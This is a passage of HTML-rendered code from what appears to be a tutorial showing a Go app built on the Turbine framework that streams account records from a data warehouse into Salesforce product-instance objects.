		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;result&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;unexpected query result&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	obj &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; result&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; obj &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;No Product Instance Found&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	firstName &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; obj&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StringField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_First_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; firstName &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Couldn&apos;t fetch first name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsu BasicSalesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	obj &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bsu&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;SObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Product_Instance__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;ExternalIDField&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Org: &quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_Email__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_First_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;givenName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Admin_Last_Name__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;familyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Product__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;planName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Stripe_Subscription_Id__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;stripeSubscriptionId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Subscription_Status__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;subscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Workspace_Created_At__c&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountCreatedAt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
		&lt;span class=&quot;token function&quot;&gt;Upsert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; obj &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;upsert failed!&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally we pull it all together in our &lt;code class=&quot;language-text&quot;&gt;app.go&lt;/code&gt;. Here we’re using the Turbine framework to connect to our data source, get the stream of events, and process those events using the the helper functions defined above.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	platformDB&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;MY_DATA_WAREHOUSE&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	configs &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfigs&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;table.types&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;VIEW&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;incrementing.column.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResourceConfig&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Field&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;validate.non.null&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			Value&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;false&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; platformDB&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;tablename&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; configs&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

	v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; WriteToSalesforce&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//Converting the Turbine Record data to a form that&apos;s ready for&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;//sending to salesforce&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;RecordToProductData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; ProductData &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	accountId &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	createdAt &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_created_at&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	givenName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_given_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		givenName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	familyName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_family_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		familyName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	planName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;plan_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		planName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; ProductData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		accountId&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Itoa&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		email&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		givenName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            givenName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		familyName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;           familyName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		planName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;             planName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		stripeSubscriptionId&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;stripe_subscription_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		accountCreatedAt&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;     strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Itoa&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;createdAt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; WriteToSalesforce &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f WriteToSalesforce&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt; fetching of env vars&lt;/span&gt;

